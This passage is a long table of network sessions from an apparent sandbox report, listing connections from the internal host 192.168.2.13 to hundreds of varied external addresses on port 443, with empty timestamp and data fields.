                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9908192.168.2.1358162195.182.147.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9909192.168.2.1345076163.163.65.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9910192.168.2.133280899.103.110.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9911192.168.2.135154062.231.191.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9912192.168.2.1350512121.162.190.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9913192.168.2.133458464.212.42.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9914192.168.2.1336488188.210.76.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9915192.168.2.1340364143.138.37.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9916192.168.2.1355728135.224.116.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9917192.168.2.1352470164.35.132.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9918192.168.2.1353774132.27.57.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9919192.168.2.135479299.5.227.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9920192.168.2.13524249.164.77.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9921192.168.2.1335898186.251.108.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9922192.168.2.134737477.206.177.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9923192.168.2.1337290190.37.133.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9924192.168.2.135751269.68.52.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9925192.168.2.1346604223.53.29.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9926192.168.2.1347568173.221.121.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9927192.168.2.133422283.220.253.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9928192.168.2.1354192146.94.243.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9929192.168.2.133337052.20.231.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9930192.168.2.1351882211.138.194.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9931192.168.2.1334016139.170.59.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9932192.168.2.1339782115.48.195.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9933192.168.2.135267492.58.7.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9934192.168.2.1332934167.95.138.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9935192.168.2.1353408197.100.47.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9936192.168.2.133623470.88.207.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9937192.168.2.1352392184.248.249.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9938192.168.2.1356698145.80.65.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9939192.168.2.1341436158.2.92.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9940192.168.2.134113873.165.185.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9941192.168.2.135095660.106.122.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9942192.168.2.1337648165.151.118.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9943192.168.2.1351570176.15.171.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9944192.168.2.135380450.122.182.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9945192.168.2.1358498196.229.120.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9946192.168.2.1341630223.180.0.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9947192.168.2.1346298160.132.148.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9948192.168.2.135014049.166.252.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9949192.168.2.13379082.136.252.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9950192.168.2.1352302216.221.150.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9951192.168.2.1343480100.63.173.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9952192.168.2.134346678.21.8.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9953192.168.2.134318424.85.36.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9954192.168.2.1332884221.243.220.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9955192.168.2.133854635.89.39.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9956192.168.2.134995881.12.122.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9957192.168.2.135991224.29.192.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9958192.168.2.1357562211.206.225.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9959192.168.2.1334574202.10.85.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9960192.168.2.1354028121.181.183.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9961192.168.2.1348630159.157.16.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9962192.168.2.134224863.135.170.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9963192.168.2.133787423.71.232.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9964192.168.2.1355452217.105.217.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9965192.168.2.1349290110.84.251.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9966192.168.2.1338996216.77.93.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9967192.168.2.13477401.172.31.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9968192.168.2.1340486191.12.218.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9969192.168.2.1356180108.196.242.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9970192.168.2.134085443.71.19.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9971192.168.2.133887848.8.244.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9972192.168.2.1332916166.253.4.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9973192.168.2.1334820159.94.39.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9974192.168.2.1357044104.197.62.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9975192.168.2.1337120131.82.133.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9976192.168.2.1353996196.158.51.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9977192.168.2.136036624.113.152.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9978192.168.2.1345124191.29.177.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9979192.168.2.134572242.253.1.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9980192.168.2.135186463.218.39.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9981192.168.2.1360716209.213.254.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9982192.168.2.134905076.101.93.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9983192.168.2.1347690138.158.143.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9984192.168.2.1360294102.204.198.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9985192.168.2.136050458.89.238.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9986192.168.2.134742281.90.88.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9987192.168.2.1348598140.248.15.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9988192.168.2.1344950188.34.186.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9989192.168.2.1337552115.214.32.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9990192.168.2.1354330104.37.122.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9991192.168.2.1355510169.73.52.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9992192.168.2.1345678217.16.190.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9993192.168.2.1345672156.43.233.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9994192.168.2.1360658205.129.15.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9995192.168.2.1333926141.182.85.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9996192.168.2.1332794147.160.207.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9997192.168.2.1354766192.63.240.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9998192.168.2.1357222189.241.150.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9999192.168.2.134463893.112.197.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10000192.168.2.1343446153.174.87.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10001192.168.2.135950058.21.86.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10002192.168.2.1357614178.124.85.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10003192.168.2.134562234.92.105.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10004192.168.2.1353184189.25.36.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10005192.168.2.133496453.177.40.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10006192.168.2.133486239.174.178.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10007192.168.2.134621846.171.51.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10008192.168.2.1342494199.57.224.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10009192.168.2.1347592145.134.150.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10010192.168.2.135398682.151.248.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10011192.168.2.1352974198.31.242.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10012192.168.2.1353940204.209.249.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10013192.168.2.1348700222.241.40.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10014192.168.2.1346666111.40.229.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10015192.168.2.135522240.235.8.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10016192.168.2.134000012.199.174.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10017192.168.2.1333914137.194.191.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10018192.168.2.1352024100.156.176.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10019192.168.2.1346086192.24.207.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10020192.168.2.1343650195.155.19.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10021192.168.2.1342044152.26.11.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10022192.168.2.134232078.74.35.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10023192.168.2.1354008151.116.27.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10024192.168.2.135490097.137.252.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10025192.168.2.1355072107.94.146.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10026192.168.2.1343748171.230.182.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10027192.168.2.135421242.169.36.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10028192.168.2.133622038.239.4.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10029192.168.2.1356666196.189.143.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10030192.168.2.1350994203.16.41.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10031192.168.2.1342730165.213.94.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10032192.168.2.1345280181.230.135.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10033192.168.2.1349276138.252.137.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10034192.168.2.1334746131.214.150.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10035192.168.2.1350976202.62.43.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10036192.168.2.13499361.191.187.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10037192.168.2.1336852163.180.46.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10038192.168.2.133518477.3.132.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10039192.168.2.134810463.193.15.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10040192.168.2.135524245.33.99.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10041192.168.2.1346710193.228.222.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10042192.168.2.1349284181.181.134.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10043192.168.2.133594688.151.205.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10044192.168.2.1334674211.233.221.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10045192.168.2.1353304134.110.69.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10046192.168.2.1335834144.97.145.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10047192.168.2.1340558103.136.106.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10048192.168.2.1360908152.152.134.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10049192.168.2.1354216110.36.45.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10050192.168.2.134085620.123.126.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10051192.168.2.133344851.213.209.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10052192.168.2.1360814205.44.49.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10053192.168.2.134823078.110.68.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10054192.168.2.134145252.234.150.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10055192.168.2.134123098.8.90.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10056192.168.2.135111694.231.31.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10057192.168.2.1356384138.142.165.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10058192.168.2.1348012193.180.219.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10059192.168.2.1351312172.251.78.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10060192.168.2.135715086.197.192.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10061192.168.2.135493250.23.2.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10062192.168.2.133965693.55.72.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10063192.168.2.1346010219.69.36.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10064192.168.2.134443296.174.30.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10065192.168.2.135444276.110.109.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10066192.168.2.133979290.216.108.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10067192.168.2.135428279.237.93.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10068192.168.2.134101461.139.111.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10069192.168.2.1334202143.27.60.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10070192.168.2.1357370193.87.226.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10071192.168.2.135689045.195.202.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10072192.168.2.1349718146.59.49.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10073192.168.2.133581449.104.191.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10074192.168.2.1351032156.117.116.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10075192.168.2.1354846203.60.82.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10076192.168.2.134799424.127.84.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10077192.168.2.1347490171.211.122.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10078192.168.2.134018490.237.87.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10079192.168.2.1350562140.103.152.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10080192.168.2.1344596202.85.163.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10081192.168.2.1343330108.244.233.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10082192.168.2.1335658204.201.76.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10083192.168.2.134182225.111.105.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10084192.168.2.1341248105.111.112.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10085192.168.2.134715068.14.18.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10086192.168.2.136098683.63.39.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10087192.168.2.1359336148.206.55.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10088192.168.2.133784868.166.53.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10089192.168.2.134061819.216.232.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10090192.168.2.1360094186.224.74.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10091192.168.2.1349498157.120.69.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10092192.168.2.133376044.148.193.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10093192.168.2.1359936164.17.86.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10094192.168.2.1354572169.194.243.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10095192.168.2.133287478.182.222.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10096192.168.2.134385236.26.75.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10097192.168.2.1338798138.116.6.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10098192.168.2.135134481.141.59.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10099192.168.2.1345278147.212.115.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10100192.168.2.1333190133.221.111.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10101192.168.2.1353660191.192.132.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10102192.168.2.133786059.35.174.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10103192.168.2.1358042170.222.252.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10104192.168.2.135399439.242.200.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10105192.168.2.1335570212.235.172.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10106192.168.2.135592891.135.149.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10107192.168.2.133306085.104.112.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10108192.168.2.1354960198.210.45.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10109192.168.2.1340672134.81.104.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10110192.168.2.1346278123.83.119.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10111192.168.2.1336108112.244.175.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10112192.168.2.1350078104.73.221.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10113192.168.2.1349866222.32.240.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10114192.168.2.134003427.47.212.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10115192.168.2.1353590192.250.99.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10116192.168.2.1342574133.42.98.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10117192.168.2.1347780159.169.235.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10118192.168.2.1343670108.45.233.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10119192.168.2.1346552126.113.69.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10120192.168.2.1334590175.220.49.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10121192.168.2.1335686170.58.234.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10122192.168.2.1353440104.79.5.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10123192.168.2.1338906189.136.221.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10124192.168.2.134760231.216.49.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10125192.168.2.1360382187.126.130.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10126192.168.2.134641885.29.56.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10127192.168.2.133713227.44.23.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10128192.168.2.135630485.116.101.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10129192.168.2.135852041.179.203.23443
